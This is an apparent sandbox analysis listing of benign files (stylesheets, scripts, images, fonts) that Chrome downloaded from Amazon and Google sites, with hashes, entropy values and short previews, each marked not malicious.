                                                                                                                                                                          File Type:ASCII text, with very long lines (26050)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):211782
                                                                                                                                                                          Entropy (8bit):4.994172446365422
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:E4A8ABC219804CC2EB2E7CC13DE87DCF
                                                                                                                                                                          SHA1:8C3F139587C2801512665FEF41DA6D2A38DBA8BB
                                                                                                                                                                          SHA-256:4D1C6C4BCC378956DCED3A7F15CB34D3E0DA99C0E7DF60CB6DC0A0E787C1F138
                                                                                                                                                                          SHA-512:559C0A8AD63791F18B864BF9815EEE737D514E6B55DC1F910C3DF0422821350F1B37A232DBF81A3344CE4C40E1C51A358419231B79FB6B131756AC7E70DD806A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P"
                                                                                                                                                                          Preview:button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h2.a-spacing-none,h3.a-spacing-none,h4.a-spacing-none{padding-bottom:0}h1 .a-size-base,h1 .a-size-mini,h1 .a-size-small,h1.a-size-base,h1.a-size-mini,h1.a-size-small,h2 .a-size-base,h2 .a-size-mini,h2 .a-size-small,h2.a-size-base,h2.a-size-mini,h2.a-size-small,h3 .a-size-base,h3 .a-size-mini,h3 .a-size-small,h3.a-size-base,h3.a-size-mini,h3.a-size-small,h4 .a-size-base,h4 .a-size-mini,h4 .a-size-small,h4.a-size-base,h4.a-size-mini,h4.a-size-small{padding-bottom:0}h1,h2{padding-bottom:4px}h3,h4{padding-bottom:4px}.a-size-medium .a-row.a-size-base,h1 .a-row.a-size-base,h2 .a-row.a-size-base,h3 .a-row.a-size-base,h4 .a-size-large .a-row.a-size-base{padding-top:1px}.a-size-base .a-row.a-size-base{padding-top:0}.a-size-micro{font-size:10px;l
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                          Entropy (8bit):3.0241026136709444
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                                                          SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                                                          SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                                                          SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2517
                                                                                                                                                                          Entropy (8bit):7.783632518357717
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C3B3969B9841D37F783AEF5C0F576147
                                                                                                                                                                          SHA1:2E0EDCE41D718406AD5D0C1D28877DBD5F97BA56
                                                                                                                                                                          SHA-256:B6D1C1172E4990D92D315A8A4C20513C92FE7C14E385CB098A10E366A47A659A
                                                                                                                                                                          SHA-512:58D0186067E4E55F1234DCC0737431FE64F16B7592520A236117B300C67DF9C741AC473F7E109244B6893F9B68644918C1D9109E15A6FD0092D735D791E84206
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!"1.AQ.aq......#2Urs.56Bu....ERb..$%4CTd................................................."A..............?...)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)Xz..m.A%...1...p.....+8e.w..H....*..Z8..(........W...m.._.0[.V6....`J...j.s.....X..9\.P....gtn..8.7.?.;g%.8.....2R0.><.....)....r.<Ey.>.......L._."...%;... .`qV.#.Z.;.".k.kK.....>~......w......R..R..R...F......[Z...k..$]..1...O..7..\......[.MoW.O.."xma.p.|.pn.V....l.H.|L..L .......;.....5....C...fW.pj...~!.R.g..i......B0%..d..._m..""C....#@...\I.m....S.....r.t.....>[..H.+..p&.,.f.....h....F-<...f%..|....x5k.mI`.x.H.`.v.t..5.e.6...v....X.T..EQ....Pqc@....A."..g.8..Ml.]..T.ywk...`G..w4."<1$..hc*.{.7W.d.#.c.$Ub]N0[1[....=.'....}sf..&.{y.V.......2CA.Gx..?..`..b....wc{.9.2....;.v..um..(.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2217
                                                                                                                                                                          Entropy (8bit):7.763232425881294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:38CD1426357C25291756558420E6E58F
                                                                                                                                                                          SHA1:6BFD142EC6CCB8F68F426F7965985C97EE674A94
                                                                                                                                                                          SHA-256:9C089C10BB13717D621FFE86356C0E4DDE3B75ADB955B462097D3435EC714EDE
                                                                                                                                                                          SHA-512:5D1707E7A6069F44B3CD443D6ADE3597CAD70068917FED7E1C83747EB39F716658B8B319C78403CC7513B84E020D3AD9C9E99FA5209A40F71CCD57502FEABBDD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................1.!A."2Q..abr..#CRq.....%..$S..............................................1B.............?............d.7;.....6KD.H._S.^.....H7.(.y..p..!_e...d../.jj.)8.....[%k................U'..d.........j)%d.g....D@DD.D@DD.D@U.5E.....F.c.E..&..g...1...x..VUZm.B..G.........=....1.x...p.V..U#D.....l..1..X...)i....7JG..nI<.....xt1l..^.T...0..L...5Q.a.%.....I.pq....1...z....E..1{.4.+.%D......w.....c..Z.45..5.d. .Sb._.[.......$....:...~.NRFw.NW..l3.q...2.sSHL..6N7s=..jJb|1G.(f..36H....n....(.d.]xo}.....hO.....{.A;0.+..T..R.zK.9....|..wP.U...$..X..z'..h.m.Zg.c>.]..B..ADD@DD.D@DD..8....XtzV..`..-RH..9....j...k.....h.+..\k.-:Ze...n{...s;r....,:p..oy&H..Rw2K..~D.....1.$.....M.............H."(.........w...Y....jf(..b<..1.j.e..:#.....A.8..2+.8.....
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):423055
                                                                                                                                                                          Entropy (8bit):5.746870815957689
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:AF9869F5357EE07D52A757BFF95A5B68
                                                                                                                                                                          SHA1:467D1A7F0E3D876924FC28985E5962D0C2D6FA06
                                                                                                                                                                          SHA-256:C2A6F7C9C4972D3CBFA27D5D7A59EBBED2B4BF87B8CC01C3AF697C860AA9F5A2
                                                                                                                                                                          SHA-512:8A2FD8CC318EEEACC608FFF71497E897F2C5E57E7CB348AFE65508F492FF38D77970BCC769241F11D3CFF11F97B3ED9CB4718E48B9D8D1053867894B35A6CB11
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.amazon.ae/service-worker.js
                                                                                                                                                                          Preview:(function(){self.getServiceWorkerGlobalClientConfigData=function(){try{return JSON.parse(decodeURIComponent("%7B%22deviceProperties%22:%7B%22appType%22:%22web%22,%22deviceType%22:%22desktop%22%7D,%22marketplaceProperties%22:%7B%22countryCode%22:%22ae%22,%22marketplaceName%22:%22Amazon.ae%22,%22obfuscatedMarketplaceId%22:%22A2VIGQ35RCS4UG%22%7D,%22namespaces%22:%7B%22in-latency%22:%7B%22lightsaber-web%22:%7B%22data%22:%7B%22clientEnabled%22:true%7D%7D,%22lightsaber-mshop%22:%7B%22data%22:%7B%22clientEnabled%22:false%7D%7D%7D,%22lightsaber-rule-levers%22:%7B%22bazaar-gateway-mshop-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22buyagain-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22cart-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22browsepage-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22search-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22detail-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1518)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):233546
                                                                                                                                                                          Entropy (8bit):5.474988949784569
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:1F75C91FBE058568689DDD9A50C5A10A
                                                                                                                                                                          SHA1:C1AA7ED354526783F71F4B18B692C6CCA2A36081
                                                                                                                                                                          SHA-256:C5DF4C40A235D49E4379852E36E5C38794652D7CFD96ABCC6D43A16C4836969E
                                                                                                                                                                          SHA-512:2F9C4C15F4739ED47D885C5EB8A0B62657B135516254B098E86097442F7CF1898EF36BD88FA3B59CF4BEAAC0098813F569E4CD533A5AAF48CBFB6E3B1E40F1E2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.Dv_TT86KXl4.es5.O/ck=boq-one-google.OneGoogleWidgetUi.xexmpZqkioA.L.B1.O/am=QKBgwGw/d=1/exm=_b,_tp/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHu61g-i-YBZiLcGm3tURf4VJO5hyA/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:QIhFr;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ws9Tlc,n73qwf,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,COQbmf,fKUV3e,aurFic,U0aPgd,ZwDk9d,V3dDOb,mI3LFb,yYB61,O6y8ed,PrPYRd,MpJwZc,LEikZe,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,mdR7q,wmnU7d,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,KG2eXe,Z5uLle,MdUzUe,VwDzFe,zbML3c,A7fCU,zr1jrb,Uas9Hd,pjICDe"
                                                                                                                                                                          Preview:"use strict";_F_installCss(".KL4X6e{background:#eee;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:.8}sentinel{}");.this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{.var nz;_.hz=function(a,b,c,d,e,f,g){a=a.ua;var h=(0,_.gd)(a);_.mc(h);b=_.Gd(a,h,c,b,2,f,!0);c=d!=null?d:new c;if(g&&(typeof e!=="number"||e<0||e>b.length))throw Error();e!=void 0?b.splice(e,g,c):b.push(c);(0,_.kc)(c.ua)&2?(0,_.Jk)(b,8):(0,_.Jk)(b,16)};_.ls.prototype.Kb=_.ca(29,function(){if(this.tb.length>0){var a=this.tb[0];if("textContent"in a)return(0,_.Qh)(a.textContent);if("innerText"in a)return(0,_.Qh)(a.innerText)}return""});._.ls.prototype.jc=_.ca(28,function(){return this.tb.length==0?null:new _.J(this.tb[0])});_.J.prototype.jc=_.ca(27,function(){return this});_.ls.prototype.Ja=_.ca(26,function(){return this.tb.length?this.tb[0]:null});_.J.prototype.Ja=_.ca(25,function(){return this.tb[0]});_.iz=function(a,b,c){if(!b&&!c)return null;var
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (37608)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):379078
                                                                                                                                                                          Entropy (8bit):5.05678165383174
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:53E1B67F20FFB8226FAA266369050868
                                                                                                                                                                          SHA1:C0683838DA4E875949521CE33E7A39FEBF5D3885
                                                                                                                                                                          SHA-256:2529A095CC69CB15E041C4874B8A7B817BF836A5FD2145A833B457BCBB2E9FC8
                                                                                                                                                                          SHA-512:139DADD780F2281124553B8C7AFFE81590736A05B080BBE66E644CE58E8C7D60226908AEB4A16A8F30C67D3D424602CCE18D79275D858190779FC7900894A1C5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://images-eu.ssl-images-amazon.com/images/I/41-WpIOxHtL._RC%7C71k8Hb-USiL.css,51q0bIrdFDL.css,110cRm1b1WL.css,31-P1-9TebL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41EtvNY2OrL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G"
                                                                                                                                                                          Preview:#accountMenu-container,#hmenu-container{position:fixed;top:0;left:0;right:0;bottom:0;visibility:hidden;z-index:100000}#accountMenu-container div,#hmenu-container div{display:flex}#accountMenu-container.hmenu-visible,#hmenu-container.hmenu-visible{visibility:visible}#accountMenu-container a,#accountMenu-container a:hover,#accountMenu-container a:link,#accountMenu-container a:visited,#hmenu-container a,#hmenu-container a:hover,#hmenu-container a:link,#hmenu-container a:visited{font-family:inherit}#accountMenu-container #accountMenu-canvas-background,#accountMenu-container #hmenu-canvas-background,#hmenu-container #accountMenu-canvas-background,#hmenu-container #hmenu-canvas-background{position:absolute;will-change:opacity;height:100%;width:100%;-webkit-tap-highlight-color:transparent}#accountMenu-container #accountMenu-canvas-background.hmenu-bkg-color,#accountMenu-container #hmenu-canvas-background.hmenu-bkg-color,#hmenu-container #accountMenu-canvas-background.hmenu-bkg-color,#hmenu-co
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4925
                                                                                                                                                                          Entropy (8bit):7.862162116183096
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:8C5A85B68060E9C9B1B3493807AA6D68
                                                                                                                                                                          SHA1:8A108C09112AD4F9B34737D338F2E8DCA2F1A944
                                                                                                                                                                          SHA-256:671410E2D0B9C7923A43A16FBD87990B33E1E66929BC17C01989CB4E92C39C93
                                                                                                                                                                          SHA-512:E8FB20962F1A481845CCFD9DD55929F6CE1DF7FF588E80EE30DFC625FEAA97B91E169C4B4F6F747D90A3C283B66472EBC7339BB3739972D1D20F740060261B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/Mjk3N2FlNDQt/Mjk3N2FlNDQt-MjZkMGVmMzUt-w186._SY116_CB650209417_.jpg
                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................t...."..........4......................................................................Q.[...@...8........r.t*.k....[}..^.....Of.P....}....>.q.}_,...6......v.......8W.....Y....LV.6...`.....e|...~..\.wT..s.sT...r....F..a.z....ai.W......:.c.+9J..!.....o...c.r..X......4..g.Tz?.........S.....Sm..v-..3..D........kJ6ks.^.....b..w2.d.b................+................................0.!1@."#P..............N..B..<v..........I.a...6.W}.K%.s.^......'....)....]...7.<F.x.v.w.k.cf".>.[.3..6...bO"...[i...<....0..#.[..F..V.4?..4..`i..F..1|..`.6...3k..EW.cr.W.....R.....9&.bq.ry.J.U._.n,..[@......b..].......I.......L.A..J....?..3J2...3......S.._.A....L...^C.}.6.oN.lU.m/6:4..{.;1G.][.I.....v...X.Sk..9'PU,.B.#..#......D....2......g....q.1..,c9......5..e..#.y..Rs.J..5....`....K...,..fa.,g9......"I......
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1689), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1689
                                                                                                                                                                          Entropy (8bit):5.640520027557763
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:45DD7BD58C9F085DA52FA16A2A150066
                                                                                                                                                                          SHA1:9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
                                                                                                                                                                          SHA-256:0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
                                                                                                                                                                          SHA-512:520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.google.com/xjs/_/ss/k=xjs.hd.V_kxjztwoQ8.L.B1.O/am=AFEAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAIAAAEAAAAAAAAQAGwkwAAAQBsAEAAAAAABAAIAAAAAABAAQAAAQSwAAAAAAAQAAAREAEAAgQAAAAAhIAAAAQgQAgQQAICQBCFAAAAAAMAACEADDAMQKgAYBQgAAAAAICACAAAAABqBCBAAIAegQAwAAQRAABCQAcgAAACAASAAAAMBDBABhAAAAAAAAAAGQAAAAAAAAAAAAAAAAAAAAAAAAAAQAAQAFAAAAAAAAAAAAAAAAAAAAAAAQ/d=0/br=1/rs=ACT90oEa5ADH0CT4QalUDMc_Rr04D2knww/m=syju,sykz?xjs=s4"
                                                                                                                                                                          Preview:.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 21508, version 1.0
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):21508
                                                                                                                                                                          Entropy (8bit):7.989562036604764
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:49A8476C4C1CBBE861D58EE73146477F
                                                                                                                                                                          SHA1:FAC44C6A6EB11604F6CB0A9901566FAFC93080E3
                                                                                                                                                                          SHA-256:5D2E0937AFADFE093EB3FFDB36AC561DA423F81A9DFBC0A875CE29D32584B6F4
                                                                                                                                                                          SHA-512:485419C61167DE6851CC9D9A73B5F9691F6D01465AE81670F7C82A0F97D5C60F67F7A174A1C0094BD51411E00E6D3AC0A69D9ED7DDFBB959E09F46491945D915
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/VjTR4RqBzY0mUYx.woff2
                                                                                                                                                                          Preview:wOF2......T...........S.........................?FFTM......Z..^.`..j.*..e.....P..:..X..6.$..,. .."..`..6...'..v.$.......`...An..T..@.....z;.....t.Q.>.U..nD......!M...pY..5.>kL.L....d..........D..v g..= O.."......+...B..2._.h;..:......./.F/.>=.....~...<%..Na..p.6..e.x..jY.'..\`......T?.#..#PJ..-...V.U5-...1....*Z...c~V..E..Y.Q*F...C.y...}y..h..E.N...tc..d.j_D.u..l....d...=...R.mRv!.....{.\..W!G...b....c..2..Eg.IqS>>....S=...$..(.k....Bu2T@>*._....|....jl..|.._.tq...; s.~.x.!.dD..+.P..p...v2;..Z...D=.0eE...$.........o...]...T..''z;..61.S=.1.p./j.T....;qw\q..C.+...Qp.......e.v..G..M.8e*..h....%....v.t..z....k; E....._>.&.../..?{..P("%w...!...vB._S....Z..X......'...n.k*U.}.....J..<..2..........0..^....F.... u.:D..W/...3@.,..U.:s...w..lU.][...TO.....GB..%..........c..j.......%...0..<.W....d).z0.7L.&..1eJ.'K...Y.~...{vW.(K):c..\.l.^....3....C.1.J$...@..]R..j..u...}._].._:..}......6\..O.o.:.t$.....2$\....;@....>..J.*].|..S.._... .NY..(...k..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):15344
                                                                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (32108)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):48459
                                                                                                                                                                          Entropy (8bit):5.800614220366823
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6C7FB4529BB2FDA65B42B861B652D2A1
                                                                                                                                                                          SHA1:11F968B350040F8F4E710EFFA4CEB398000FADB8
                                                                                                                                                                          SHA-256:014F1079DDBC808E44D6A05B9DED92B2D8549D007F0E3E5FD2319D29606AA3F9
                                                                                                                                                                          SHA-512:306F3F6161F10EBFC7E8035C6219F996BABDE7F2AE8F192718B19ADB3472E17EDE0A341B84FCE74EE375F58ED7D4F56A954CE14AF11324697297FD05E87D445A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en
